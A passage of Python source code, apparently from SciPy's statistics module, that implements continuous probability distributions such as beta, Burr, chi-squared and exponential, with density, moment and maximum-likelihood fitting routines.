# This exception is raised by, for example, beta_gen.fit when
# optimize.fsolve returns with ier != 1.
def __init__(self, mesg):
emsg = "Solver for the MLE equations failed to converge: "
emsg += mesg.replace('\n', '')
self.args = (emsg,)
def _beta_mle_a(a, b, n, s1):
# The zeros of this function give the MLE for `a`, with
# `b`, `n` and `s1` given. `s1` is the sum of the logs of
# the data. `n` is the number of data points.
psiab = sc.psi(a + b)
func = s1 - n * (-psiab + sc.psi(a))
return func
def _beta_mle_ab(theta, n, s1, s2):
# Zeros of this function are critical points of
# the maximum likelihood function. Solving this system
# for theta (which contains a and b) gives the MLE for a and b
# given `n`, `s1` and `s2`. `s1` is the sum of the logs of the data,
# and `s2` is the sum of the logs of 1 - data. `n` is the number
# of data points.
a, b = theta
psiab = sc.psi(a + b)
func = [s1 - n * (-psiab + sc.psi(a)),
s2 - n * (-psiab + sc.psi(b))]
return func
class beta_gen(rv_continuous):
r"""A beta continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `beta` is:
.. math::
f(x, a, b) = \frac{\Gamma(a+b) x^{a-1} (1-x)^{b-1}}
{\Gamma(a) \Gamma(b)}
for :math:`0 <= x <= 1`, :math:`a > 0`, :math:`b > 0`, where
:math:`\Gamma` is the gamma function (`scipy.special.gamma`).
`beta` takes :math:`a` and :math:`b` as shape parameters.
%(after_notes)s
%(example)s
"""
def _rvs(self, a, b):
return self._random_state.beta(a, b, self._size)
def _pdf(self, x, a, b):
# gamma(a+b) * x**(a-1) * (1-x)**(b-1)
# beta.pdf(x, a, b) = ------------------------------------
# gamma(a)*gamma(b)
return np.exp(self._logpdf(x, a, b))
def _logpdf(self, x, a, b):
lPx = sc.xlog1py(b - 1.0, -x) + sc.xlogy(a - 1.0, x)
lPx -= sc.betaln(a, b)
return lPx
def _cdf(self, x, a, b):
return sc.btdtr(a, b, x)
def _ppf(self, q, a, b):
return sc.btdtri(a, b, q)
def _stats(self, a, b):
mn = a*1.0 / (a + b)
var = (a*b*1.0)/(a+b+1.0)/(a+b)**2.0
g1 = 2.0*(b-a)*np.sqrt((1.0+a+b)/(a*b)) / (2+a+b)
g2 = 6.0*(a**3 + a**2*(1-2*b) + b**2*(1+b) - 2*a*b*(2+b))
g2 /= a*b*(a+b+2)*(a+b+3)
return mn, var, g1, g2
def _fitstart(self, data):
g1 = _skew(data)
g2 = _kurtosis(data)
def func(x):
a, b = x
sk = 2*(b-a)*np.sqrt(a + b + 1) / (a + b + 2) / np.sqrt(a*b)
ku = a**3 - a**2*(2*b-1) + b**2*(b+1) - 2*a*b*(b+2)
ku /= a*b*(a+b+2)*(a+b+3)
ku *= 6
return [sk-g1, ku-g2]
a, b = optimize.fsolve(func, (1.0, 1.0))
return super(beta_gen, self)._fitstart(data, args=(a, b))
@extend_notes_in_docstring(rv_continuous, notes="""\
In the special case where both `floc` and `fscale` are given, a
`ValueError` is raised if any value `x` in `data` does not satisfy
`floc < x < floc + fscale`.\n\n""")
def fit(self, data, *args, **kwds):
# Override rv_continuous.fit, so we can more efficiently handle the
# case where floc and fscale are given.
floc = kwds.get('floc', None)
fscale = kwds.get('fscale', None)
if floc is None or fscale is None:
# do general fit
return super(beta_gen, self).fit(data, *args, **kwds)
# We already got these from kwds, so just pop them.
kwds.pop('floc', None)
kwds.pop('fscale', None)
f0 = _get_fixed_fit_value(kwds, ['f0', 'fa', 'fix_a'])
f1 = _get_fixed_fit_value(kwds, ['f1', 'fb', 'fix_b'])
_remove_optimizer_parameters(kwds)
if f0 is not None and f1 is not None:
# This check is for consistency with `rv_continuous.fit`.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
# Special case: loc and scale are constrained, so we are fitting
# just the shape parameters. This can be done much more efficiently
# than the method used in `rv_continuous.fit`. (See the subsection
# "Two unknown parameters" in the section "Maximum likelihood" of
# the Wikipedia article on the Beta distribution for the formulas.)
# Normalize the data to the interval [0, 1].
data = (np.ravel(data) - floc) / fscale
if np.any(data <= 0) or np.any(data >= 1):
raise FitDataError("beta", lower=floc, upper=floc + fscale)
xbar = data.mean()
if f0 is not None or f1 is not None:
# One of the shape parameters is fixed.
if f0 is not None:
# The shape parameter a is fixed, so swap the parameters
# and flip the data. We always solve for `a`. The result
# will be swapped back before returning.
b = f0
data = 1 - data
xbar = 1 - xbar
else:
b = f1
# Initial guess for a. Use the formula for the mean of the beta
# distribution, E[x] = a / (a + b), to generate a reasonable
# starting point based on the mean of the data and the given
# value of b.
a = b * xbar / (1 - xbar)
# Compute the MLE for `a` by solving _beta_mle_a.
theta, info, ier, mesg = optimize.fsolve(
_beta_mle_a, a,
args=(b, len(data), np.log(data).sum()),
full_output=True
)
if ier != 1:
raise FitSolverError(mesg=mesg)
a = theta[0]
if f0 is not None:
# The shape parameter a was fixed, so swap back the
# parameters.
a, b = b, a
else:
# Neither of the shape parameters is fixed.
# s1 and s2 are used in the extra arguments passed to _beta_mle_ab
# by optimize.fsolve.
s1 = np.log(data).sum()
s2 = sc.log1p(-data).sum()
# Use the "method of moments" to estimate the initial
# guess for a and b.
fac = xbar * (1 - xbar) / data.var(ddof=0) - 1
a = xbar * fac
b = (1 - xbar) * fac
# Compute the MLE for a and b by solving _beta_mle_ab.
theta, info, ier, mesg = optimize.fsolve(
_beta_mle_ab, [a, b],
args=(len(data), s1, s2),
full_output=True
)
if ier != 1:
raise FitSolverError(mesg=mesg)
a, b = theta
return a, b, floc, fscale
beta = beta_gen(a=0.0, b=1.0, name='beta')
class betaprime_gen(rv_continuous):
r"""A beta prime continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `betaprime` is:
.. math::
f(x, a, b) = \frac{x^{a-1} (1+x)^{-a-b}}{\beta(a, b)}
for :math:`x >= 0`, :math:`a > 0`, :math:`b > 0`, where
:math:`\beta(a, b)` is the beta function (see `scipy.special.beta`).
`betaprime` takes ``a`` and ``b`` as shape parameters.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self, a, b):
sz, rndm = self._size, self._random_state
u1 = gamma.rvs(a, size=sz, random_state=rndm)
u2 = gamma.rvs(b, size=sz, random_state=rndm)
return u1 / u2
def _pdf(self, x, a, b):
# betaprime.pdf(x, a, b) = x**(a-1) * (1+x)**(-a-b) / beta(a, b)
return np.exp(self._logpdf(x, a, b))
def _logpdf(self, x, a, b):
return sc.xlogy(a - 1.0, x) - sc.xlog1py(a + b, x) - sc.betaln(a, b)
def _cdf(self, x, a, b):
return sc.betainc(a, b, x/(1.+x))
def _munp(self, n, a, b):
if n == 1.0:
return np.where(b > 1,
a/(b-1.0),
np.inf)
elif n == 2.0:
return np.where(b > 2,
a*(a+1.0)/((b-2.0)*(b-1.0)),
np.inf)
elif n == 3.0:
return np.where(b > 3,
a*(a+1.0)*(a+2.0)/((b-3.0)*(b-2.0)*(b-1.0)),
np.inf)
elif n == 4.0:
return np.where(b > 4,
(a*(a + 1.0)*(a + 2.0)*(a + 3.0) /
((b - 4.0)*(b - 3.0)*(b - 2.0)*(b - 1.0))),
np.inf)
else:
raise NotImplementedError
betaprime = betaprime_gen(a=0.0, name='betaprime')
class bradford_gen(rv_continuous):
r"""A Bradford continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `bradford` is:
.. math::
f(x, c) = \frac{c}{\log(1+c) (1+cx)}
for :math:`0 <= x <= 1` and :math:`c > 0`.
`bradford` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# bradford.pdf(x, c) = c / (k * (1+c*x))
return c / (c*x + 1.0) / sc.log1p(c)
def _cdf(self, x, c):
return sc.log1p(c*x) / sc.log1p(c)
def _ppf(self, q, c):
return sc.expm1(q * sc.log1p(c)) / c
def _stats(self, c, moments='mv'):
k = np.log(1.0+c)
mu = (c-k)/(c*k)
mu2 = ((c+2.0)*k-2.0*c)/(2*c*k*k)
g1 = None
g2 = None
if 's' in moments:
g1 = np.sqrt(2)*(12*c*c-9*c*k*(c+2)+2*k*k*(c*(c+3)+3))
g1 /= np.sqrt(c*(c*(k-2)+2*k))*(3*c*(k-2)+6*k)
if 'k' in moments:
g2 = (c**3*(k-3)*(k*(3*k-16)+24)+12*k*c*c*(k-4)*(k-3) +
6*c*k*k*(3*k-14) + 12*k**3)
g2 /= 3*c*(c*(k-2)+2*k)**2
return mu, mu2, g1, g2
def _entropy(self, c):
k = np.log(1+c)
return k/2.0 - np.log(c/k)
bradford = bradford_gen(a=0.0, b=1.0, name='bradford')
class burr_gen(rv_continuous):
r"""A Burr (Type III) continuous random variable.
%(before_notes)s
See Also
--------
fisk : a special case of either `burr` or `burr12` with ``d=1``
burr12 : Burr Type XII distribution
mielke : Mielke Beta-Kappa / Dagum distribution
Notes
-----
The probability density function for `burr` is:
.. math::
f(x, c, d) = c d x^{-c - 1} / (1 + x^{-c})^{d + 1}
for :math:`x >= 0` and :math:`c, d > 0`.
`burr` takes :math:`c` and :math:`d` as shape parameters.
This is the PDF corresponding to the third CDF given in Burr's list;
specifically, it is equation (11) in Burr's paper [1]_. The distribution
is also commonly referred to as the Dagum distribution [2]_. If the
parameter :math:`c < 1` then the mean of the distribution does not
exist and if :math:`c < 2` the variance does not exist [2]_.
The PDF is finite at the left endpoint :math:`x = 0` if :math:`c * d >= 1`.
%(after_notes)s
References
----------
.. [1] Burr, I. W. "Cumulative frequency functions", Annals of
Mathematical Statistics, 13(2), pp 215-232 (1942).
.. [2] https://en.wikipedia.org/wiki/Dagum_distribution
.. [3] Kleiber, Christian. "A guide to the Dagum distributions."
Modeling Income Distributions and Lorenz Curves pp 97-117 (2008).
%(example)s
"""
# Do not set _support_mask to rv_continuous._open_support_mask
# Whether the left-hand endpoint is suitable for pdf evaluation is dependent
# on the values of c and d: if c*d >= 1, the pdf is finite, otherwise infinite.
def _pdf(self, x, c, d):
# burr.pdf(x, c, d) = c * d * x**(-c-1) * (1+x**(-c))**(-d-1)
output = _lazywhere(x == 0, [x, c, d],
lambda x_, c_, d_: c_ * d_ * (x_**(c_*d_-1)) / (1 + x_**c_),
f2 = lambda x_, c_, d_: (c_ * d_ * (x_ ** (-c_ - 1.0)) /
((1 + x_ ** (-c_)) ** (d_ + 1.0))))
if output.ndim == 0:
return output[()]
return output
def _logpdf(self, x, c, d):
output = _lazywhere(
x == 0, [x, c, d],
lambda x_, c_, d_: (np.log(c_) + np.log(d_) + sc.xlogy(c_*d_ - 1, x_)
- (d_+1) * sc.log1p(x_**(c_))),
f2 = lambda x_, c_, d_: (np.log(c_) + np.log(d_)
+ sc.xlogy(-c_ - 1, x_)
- sc.xlog1py(d_+1, x_**(-c_))))
if output.ndim == 0:
return output[()]
return output
def _cdf(self, x, c, d):
return (1 + x**(-c))**(-d)
def _logcdf(self, x, c, d):
return sc.log1p(x**(-c)) * (-d)
def _sf(self, x, c, d):
return np.exp(self._logsf(x, c, d))
def _logsf(self, x, c, d):
return np.log1p(- (1 + x**(-c))**(-d))
def _ppf(self, q, c, d):
return (q**(-1.0/d) - 1)**(-1.0/c)
def _stats(self, c, d):
nc = np.arange(1, 5).reshape(4,1) / c
#ek is the kth raw moment, e1 is the mean e2-e1**2 variance etc.
e1, e2, e3, e4 = sc.beta(d + nc, 1. - nc) * d
mu = np.where(c > 1.0, e1, np.nan)
mu2_if_c = e2 - mu**2
mu2 = np.where(c > 2.0, mu2_if_c, np.nan)
g1 = _lazywhere(
c > 3.0,
(c, e1, e2, e3, mu2_if_c),
lambda c, e1, e2, e3, mu2_if_c: (e3 - 3*e2*e1 + 2*e1**3) / np.sqrt((mu2_if_c)**3),
fillvalue=np.nan)
g2 = _lazywhere(
c > 4.0,
(c, e1, e2, e3, e4, mu2_if_c),
lambda c, e1, e2, e3, e4, mu2_if_c: (
((e4 - 4*e3*e1 + 6*e2*e1**2 - 3*e1**4) / mu2_if_c**2) - 3),
fillvalue=np.nan)
return mu, mu2, g1, g2
def _munp(self, n, c, d):
def __munp(n, c, d):
nc = 1. * n / c
return d * sc.beta(1.0 - nc, d + nc)
n, c, d = np.asarray(n), np.asarray(c), np.asarray(d)
return _lazywhere((c > n) & (n == n) & (d == d), (c, d, n),
lambda c, d, n: __munp(n, c, d),
np.nan)
burr = burr_gen(a=0.0, name='burr')
class burr12_gen(rv_continuous):
r"""A Burr (Type XII) continuous random variable.
%(before_notes)s
See Also
--------
fisk : a special case of either `burr` or `burr12` with ``d=1``
burr : Burr Type III distribution
Notes
-----
The probability density function for `burr` is:
.. math::
f(x, c, d) = c d x^{c-1} / (1 + x^c)^{d + 1}
for :math:`x >= 0` and :math:`c, d > 0`.
`burr12` takes ``c`` and ``d`` as shape parameters for :math:`c`
and :math:`d`.
This is the PDF corresponding to the twelfth CDF given in Burr's list;
specifically, it is equation (20) in Burr's paper [1]_.
%(after_notes)s
The Burr type 12 distribution is also sometimes referred to as
the Singh-Maddala distribution from NIST [2]_.
References
----------
.. [1] Burr, I. W. "Cumulative frequency functions", Annals of
Mathematical Statistics, 13(2), pp 215-232 (1942).
.. [2] https://www.itl.nist.gov/div898/software/dataplot/refman2/auxillar/b12pdf.htm
.. [3] "Burr distribution",
https://en.wikipedia.org/wiki/Burr_distribution
%(example)s
"""
def _pdf(self, x, c, d):
# burr12.pdf(x, c, d) = c * d * x**(c-1) * (1+x**(c))**(-d-1)
return np.exp(self._logpdf(x, c, d))
def _logpdf(self, x, c, d):
return np.log(c) + np.log(d) + sc.xlogy(c - 1, x) + sc.xlog1py(-d-1, x**c)
def _cdf(self, x, c, d):
return -sc.expm1(self._logsf(x, c, d))
def _logcdf(self, x, c, d):
return sc.log1p(-(1 + x**c)**(-d))
def _sf(self, x, c, d):
return np.exp(self._logsf(x, c, d))
def _logsf(self, x, c, d):
return sc.xlog1py(-d, x**c)
def _ppf(self, q, c, d):
# The following is an implementation of
# ((1 - q)**(-1.0/d) - 1)**(1.0/c)
# that does a better job handling small values of q.
return sc.expm1(-1/d * sc.log1p(-q))**(1/c)
def _munp(self, n, c, d):
nc = 1. * n / c
return d * sc.beta(1.0 + nc, d - nc)
burr12 = burr12_gen(a=0.0, name='burr12')
class fisk_gen(burr_gen):
r"""A Fisk continuous random variable.
The Fisk distribution is also known as the log-logistic distribution.
%(before_notes)s
Notes
-----
The probability density function for `fisk` is:
.. math::
f(x, c) = c x^{-c-1} (1 + x^{-c})^{-2}
for :math:`x >= 0` and :math:`c > 0`.
`fisk` takes ``c`` as a shape parameter for :math:`c`.
`fisk` is a special case of `burr` or `burr12` with ``d=1``.
%(after_notes)s
See Also
--------
burr
%(example)s
"""
def _pdf(self, x, c):
# fisk.pdf(x, c) = c * x**(-c-1) * (1 + x**(-c))**(-2)
return burr._pdf(x, c, 1.0)
def _cdf(self, x, c):
return burr._cdf(x, c, 1.0)
def _sf(self, x, c):
return burr._sf(x, c, 1.0)
def _logpdf(self, x, c):
# fisk.pdf(x, c) = c * x**(-c-1) * (1 + x**(-c))**(-2)
return burr._logpdf(x, c, 1.0)
def _logcdf(self, x, c):
return burr._logcdf(x, c, 1.0)
def _logsf(self, x, c):
return burr._logsf(x, c, 1.0)
def _ppf(self, x, c):
return burr._ppf(x, c, 1.0)
def _munp(self, n, c):
return burr._munp(n, c, 1.0)
def _stats(self, c):
return burr._stats(c, 1.0)
def _entropy(self, c):
return 2 - np.log(c)
fisk = fisk_gen(a=0.0, name='fisk')
# median = loc
class cauchy_gen(rv_continuous):
r"""A Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `cauchy` is
.. math::
f(x) = \frac{1}{\pi (1 + x^2)}
for a real number :math:`x`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# cauchy.pdf(x) = 1 / (pi * (1 + x**2))
return 1.0/np.pi/(1.0+x*x)
def _cdf(self, x):
return 0.5 + 1.0/np.pi*np.arctan(x)
def _ppf(self, q):
return np.tan(np.pi*q-np.pi/2.0)
def _sf(self, x):
return 0.5 - 1.0/np.pi*np.arctan(x)
def _isf(self, q):
return np.tan(np.pi/2.0-np.pi*q)
def _stats(self):
return np.nan, np.nan, np.nan, np.nan
def _entropy(self):
return np.log(4*np.pi)
def _fitstart(self, data, args=None):
# Initialize ML guesses using quartiles instead of moments.
p25, p50, p75 = np.percentile(data, [25, 50, 75])
return p50, (p75 - p25)/2
cauchy = cauchy_gen(name='cauchy')
class chi_gen(rv_continuous):
r"""A chi continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `chi` is:
.. math::
f(x, k) = \frac{1}{2^{k/2-1} \Gamma \left( k/2 \right)}
x^{k-1} \exp \left( -x^2/2 \right)
for :math:`x >= 0` and :math:`k > 0` (degrees of freedom, denoted ``df``
in the implementation). :math:`\Gamma` is the gamma function
(`scipy.special.gamma`).
Special cases of `chi` are:
- ``chi(1, loc, scale)`` is equivalent to `halfnorm`
- ``chi(2, 0, scale)`` is equivalent to `rayleigh`
- ``chi(3, 0, scale)`` is equivalent to `maxwell`
`chi` takes ``df`` as a shape parameter.
%(after_notes)s
%(example)s
"""
def _rvs(self, df):
sz, rndm = self._size, self._random_state
return np.sqrt(chi2.rvs(df, size=sz, random_state=rndm))
def _pdf(self, x, df):
# x**(df-1) * exp(-x**2/2)
# chi.pdf(x, df) = -------------------------
# 2**(df/2-1) * gamma(df/2)
return np.exp(self._logpdf(x, df))
def _logpdf(self, x, df):
l = np.log(2) - .5*np.log(2)*df - sc.gammaln(.5*df)
return l + sc.xlogy(df - 1., x) - .5*x**2
def _cdf(self, x, df):
return sc.gammainc(.5*df, .5*x**2)
def _ppf(self, q, df):
return np.sqrt(2*sc.gammaincinv(.5*df, q))
def _stats(self, df):
mu = np.sqrt(2)*sc.gamma(df/2.0+0.5)/sc.gamma(df/2.0)
mu2 = df - mu*mu
g1 = (2*mu**3.0 + mu*(1-2*df))/np.asarray(np.power(mu2, 1.5))
g2 = 2*df*(1.0-df)-6*mu**4 + 4*mu**2 * (2*df-1)
g2 /= np.asarray(mu2**2.0)
return mu, mu2, g1, g2
chi = chi_gen(a=0.0, name='chi')
## Chi-squared (gamma-distributed with loc=0 and scale=2 and shape=df/2)
class chi2_gen(rv_continuous):
r"""A chi-squared continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `chi2` is:
.. math::
f(x, k) = \frac{1}{2^{k/2} \Gamma \left( k/2 \right)}
x^{k/2-1} \exp \left( -x/2 \right)
for :math:`x > 0` and :math:`k > 0` (degrees of freedom, denoted ``df``
in the implementation).
`chi2` takes ``df`` as a shape parameter.
%(after_notes)s
%(example)s
"""
def _rvs(self, df):
return self._random_state.chisquare(df, self._size)
def _pdf(self, x, df):
# chi2.pdf(x, df) = 1 / (2*gamma(df/2)) * (x/2)**(df/2-1) * exp(-x/2)
return np.exp(self._logpdf(x, df))
def _logpdf(self, x, df):
return sc.xlogy(df/2.-1, x) - x/2. - sc.gammaln(df/2.) - (np.log(2)*df)/2.
def _cdf(self, x, df):
return sc.chdtr(df, x)
def _sf(self, x, df):
return sc.chdtrc(df, x)
def _isf(self, p, df):
return sc.chdtri(df, p)
def _ppf(self, p, df):
return 2*sc.gammaincinv(df/2, p)
def _stats(self, df):
mu = df
mu2 = 2*df
g1 = 2*np.sqrt(2.0/df)
g2 = 12.0/df
return mu, mu2, g1, g2
chi2 = chi2_gen(a=0.0, name='chi2')
class cosine_gen(rv_continuous):
r"""A cosine continuous random variable.
%(before_notes)s
Notes
-----
The cosine distribution is an approximation to the normal distribution.
The probability density function for `cosine` is:
.. math::
f(x) = \frac{1}{2\pi} (1+\cos(x))
for :math:`-\pi \le x \le \pi`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# cosine.pdf(x) = 1/(2*pi) * (1+cos(x))
return 1.0/2/np.pi*(1+np.cos(x))
def _cdf(self, x):
return 1.0/2/np.pi*(np.pi + x + np.sin(x))
def _stats(self):
return 0.0, np.pi*np.pi/3.0-2.0, 0.0, -6.0*(np.pi**4-90)/(5.0*(np.pi*np.pi-6)**2)
def _entropy(self):
return np.log(4*np.pi)-1.0
cosine = cosine_gen(a=-np.pi, b=np.pi, name='cosine')
class dgamma_gen(rv_continuous):
r"""A double gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `dgamma` is:
.. math::
f(x, a) = \frac{1}{2\Gamma(a)} |x|^{a-1} \exp(-|x|)
for a real number :math:`x` and :math:`a > 0`. :math:`\Gamma` is the
gamma function (`scipy.special.gamma`).
`dgamma` takes ``a`` as a shape parameter for :math:`a`.
%(after_notes)s
%(example)s
"""
def _rvs(self, a):
sz, rndm = self._size, self._random_state
u = rndm.random_sample(size=sz)
gm = gamma.rvs(a, size=sz, random_state=rndm)
return gm * np.where(u >= 0.5, 1, -1)
def _pdf(self, x, a):
# dgamma.pdf(x, a) = 1 / (2*gamma(a)) * abs(x)**(a-1) * exp(-abs(x))
ax = abs(x)
return 1.0/(2*sc.gamma(a))*ax**(a-1.0) * np.exp(-ax)
def _logpdf(self, x, a):
ax = abs(x)
return sc.xlogy(a - 1.0, ax) - ax - np.log(2) - sc.gammaln(a)
def _cdf(self, x, a):
fac = 0.5*sc.gammainc(a, abs(x))
return np.where(x > 0, 0.5 + fac, 0.5 - fac)
def _sf(self, x, a):
fac = 0.5*sc.gammainc(a, abs(x))
return np.where(x > 0, 0.5-fac, 0.5+fac)
def _ppf(self, q, a):
fac = sc.gammainccinv(a, 1-abs(2*q-1))
return np.where(q > 0.5, fac, -fac)
def _stats(self, a):
mu2 = a*(a+1.0)
return 0.0, mu2, 0.0, (a+2.0)*(a+3.0)/mu2-3.0
dgamma = dgamma_gen(name='dgamma')
class dweibull_gen(rv_continuous):
r"""A double Weibull continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `dweibull` is given by
.. math::
f(x, c) = c / 2 |x|^{c-1} \exp(-|x|^c)
for a real number :math:`x` and :math:`c > 0`.
`dweibull` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _rvs(self, c):
sz, rndm = self._size, self._random_state
u = rndm.random_sample(size=sz)
w = weibull_min.rvs(c, size=sz, random_state=rndm)
return w * (np.where(u >= 0.5, 1, -1))
def _pdf(self, x, c):
# dweibull.pdf(x, c) = c / 2 * abs(x)**(c-1) * exp(-abs(x)**c)
ax = abs(x)
Px = c / 2.0 * ax**(c-1.0) * np.exp(-ax**c)
return Px
def _logpdf(self, x, c):
ax = abs(x)
return np.log(c) - np.log(2.0) + sc.xlogy(c - 1.0, ax) - ax**c
def _cdf(self, x, c):
Cx1 = 0.5 * np.exp(-abs(x)**c)
return np.where(x > 0, 1 - Cx1, Cx1)
def _ppf(self, q, c):
fac = 2. * np.where(q <= 0.5, q, 1. - q)
fac = np.power(-np.log(fac), 1.0 / c)
return np.where(q > 0.5, fac, -fac)
def _munp(self, n, c):
return (1 - (n % 2)) * sc.gamma(1.0 + 1.0 * n / c)
# since we know that all odd moments are zeros, return them at once.
# returning Nones from _stats makes the public stats call _munp
# so overall we're saving one or two gamma function evaluations here.
def _stats(self, c):
return 0, None, 0, None
dweibull = dweibull_gen(name='dweibull')
## Exponential (gamma distributed with a=1.0, loc=loc and scale=scale)
class expon_gen(rv_continuous):
r"""An exponential continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `expon` is:
.. math::
f(x) = \exp(-x)
for :math:`x \ge 0`.
%(after_notes)s
A common parameterization for `expon` is in terms of the rate parameter
``lambda``, such that ``pdf = lambda * exp(-lambda * x)``. This
parameterization corresponds to using ``scale = 1 / lambda``.
%(example)s
"""
def _rvs(self):
return self._random_state.standard_exponential(self._size)
def _pdf(self, x):
# expon.pdf(x) = exp(-x)
return np.exp(-x)
def _logpdf(self, x):
return -x
def _cdf(self, x):
return -sc.expm1(-x)
def _ppf(self, q):
return -sc.log1p(-q)
def _sf(self, x):
return np.exp(-x)
def _logsf(self, x):
return -x
def _isf(self, q):
return -np.log(q)
def _stats(self):
return 1.0, 1.0, 2.0, 6.0
def _entropy(self):
return 1.0
@replace_notes_in_docstring(rv_continuous, notes="""\
This function uses explicit formulas for the maximum likelihood
estimation of the exponential distribution parameters, so the
`optimizer`, `loc` and `scale` keyword arguments are ignored.\n\n""")
def fit(self, data, *args, **kwds):
if len(args) > 0:
raise TypeError("Too many arguments.")
floc = kwds.pop('floc', None)
fscale = kwds.pop('fscale', None)
_remove_optimizer_parameters(kwds)
if floc is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
data = np.asarray(data)
data_min = data.min()
if floc is None:
# ML estimate of the location is the minimum of the data.
loc = data_min
else:
loc = floc
if data_min < loc:
# There are values that are less than the specified loc.
raise FitDataError("expon", lower=floc, upper=np.inf)
if fscale is None:
# ML estimate of the scale is the shifted mean.
scale = data.mean() - loc
else:
scale = fscale
# We expect the return values to be floating point, so ensure it
# by explicitly converting to float.
return float(loc), float(scale)
expon = expon_gen(a=0.0, name='expon')
## Exponentially Modified Normal (exponential distribution
## convolved with a Normal).
## This is called an exponentially modified gaussian on wikipedia
class exponnorm_gen(rv_continuous):
r"""An exponentially modified Normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `exponnorm` is:
.. math::
f(x, K) = \frac{1}{2K} \exp\left(\frac{1}{2 K^2} - x / K \right)
\text{erfc}\left(-\frac{x - 1/K}{\sqrt{2}}\right)
where :math:`x` is a real number and :math:`K > 0`.
It can be thought of as the sum of a standard normal random variable
and an independent exponentially distributed random variable with rate
``1/K``.
%(after_notes)s
An alternative parameterization of this distribution (for example, in
`Wikipedia <https://en.wikipedia.org/wiki/Exponentially_modified_Gaussian_distribution>`_)
involves three parameters, :math:`\mu`, :math:`\lambda` and
:math:`\sigma`.
In the present parameterization this corresponds to having ``loc`` and
``scale`` equal to :math:`\mu` and :math:`\sigma`, respectively, and
shape parameter :math:`K = 1/(\sigma\lambda)`.
.. versionadded:: 0.16.0
%(example)s
"""
def _rvs(self, K):
expval = self._random_state.standard_exponential(self._size) * K
gval = self._random_state.standard_normal(self._size)
return expval + gval
def _pdf(self, x, K):
# exponnorm.pdf(x, K) =
# 1/(2*K) exp(1/(2 * K**2)) exp(-x / K) * erfc-(x - 1/K) / sqrt(2))
invK = 1.0 / K
exparg = 0.5 * invK**2 - invK * x
# Avoid overflows; setting np.exp(exparg) to the max float works
# all right here
expval = _lazywhere(exparg < _LOGXMAX, (exparg,), np.exp, _XMAX)
return 0.5 * invK * (expval * sc.erfc(-(x - invK) / np.sqrt(2)))
def _logpdf(self, x, K):
invK = 1.0 / K
exparg = 0.5 * invK**2 - invK * x
return exparg + np.log(0.5 * invK * sc.erfc(-(x - invK) / np.sqrt(2)))
def _cdf(self, x, K):
invK = 1.0 / K
expval = invK * (0.5 * invK - x)
return _norm_cdf(x) - np.exp(expval) * _norm_cdf(x - invK)
def _sf(self, x, K):
invK = 1.0 / K
expval = invK * (0.5 * invK - x)
return _norm_cdf(-x) + np.exp(expval) * _norm_cdf(x - invK)
def _stats(self, K):
K2 = K * K
opK2 = 1.0 + K2
skw = 2 * K**3 * opK2**(-1.5)
krt = 6.0 * K2 * K2 * opK2**(-2)
return K, opK2, skw, krt
exponnorm = exponnorm_gen(name='exponnorm')
class exponweib_gen(rv_continuous):
r"""An exponentiated Weibull continuous random variable.
%(before_notes)s
See Also
--------
weibull_min, numpy.random.mtrand.RandomState.weibull
Notes
-----
The probability density function for `exponweib` is:
.. math::
f(x, a, c) = a c [1-\exp(-x^c)]^{a-1} \exp(-x^c) x^{c-1}
and its cumulative distribution function is:
.. math::
F(x, a, c) = [1-\exp(-x^c)]^a
for :math:`x > 0`, :math:`a > 0`, :math:`c > 0`.
`exponweib` takes :math:`a` and :math:`c` as shape parameters:
* :math:`a` is the exponentiation parameter,
with the special case :math:`a=1` corresponding to the
(non-exponentiated) Weibull distribution `weibull_min`.
* :math:`c` is the shape parameter of the non-exponentiated Weibull law.
%(after_notes)s
References
----------
https://en.wikipedia.org/wiki/Exponentiated_Weibull_distribution
%(example)s
"""
def _pdf(self, x, a, c):
# exponweib.pdf(x, a, c) =
# a * c * (1-exp(-x**c))**(a-1) * exp(-x**c)*x**(c-1)
return np.exp(self._logpdf(x, a, c))
def _logpdf(self, x, a, c):
negxc = -x**c
exm1c = -sc.expm1(negxc)
logp = (np.log(a) + np.log(c) + sc.xlogy(a - 1.0, exm1c) +
negxc + sc.xlogy(c - 1.0, x))
return logp
def _cdf(self, x, a, c):
exm1c = -sc.expm1(-x**c)
return exm1c**a
def _ppf(self, q, a, c):
return (-sc.log1p(-q**(1.0/a)))**np.asarray(1.0/c)
exponweib = exponweib_gen(a=0.0, name='exponweib')
class exponpow_gen(rv_continuous):
r"""An exponential power continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `exponpow` is:
.. math::
f(x, b) = b x^{b-1} \exp(1 + x^b - \exp(x^b))
for :math:`x \ge 0`, :math:`b > 0`. Note that this is a different
distribution from the exponential power distribution that is also known
under the names "generalized normal" or "generalized Gaussian".
`exponpow` takes ``b`` as a shape parameter for :math:`b`.
%(after_notes)s
References
----------
http://www.math.wm.edu/~leemis/chart/UDR/PDFs/Exponentialpower.pdf
%(example)s
"""
def _pdf(self, x, b):
# exponpow.pdf(x, b) = b * x**(b-1) * exp(1 + x**b - exp(x**b))
return np.exp(self._logpdf(x, b))
def _logpdf(self, x, b):
xb = x**b
f = 1 + np.log(b) + sc.xlogy(b - 1.0, x) + xb - np.exp(xb)
return f
def _cdf(self, x, b):
return -sc.expm1(-sc.expm1(x**b))
def _sf(self, x, b):
return np.exp(-sc.expm1(x**b))
def _isf(self, x, b):
return (sc.log1p(-np.log(x)))**(1./b)
def _ppf(self, q, b):
return pow(sc.log1p(-sc.log1p(-q)), 1.0/b)
exponpow = exponpow_gen(a=0.0, name='exponpow')
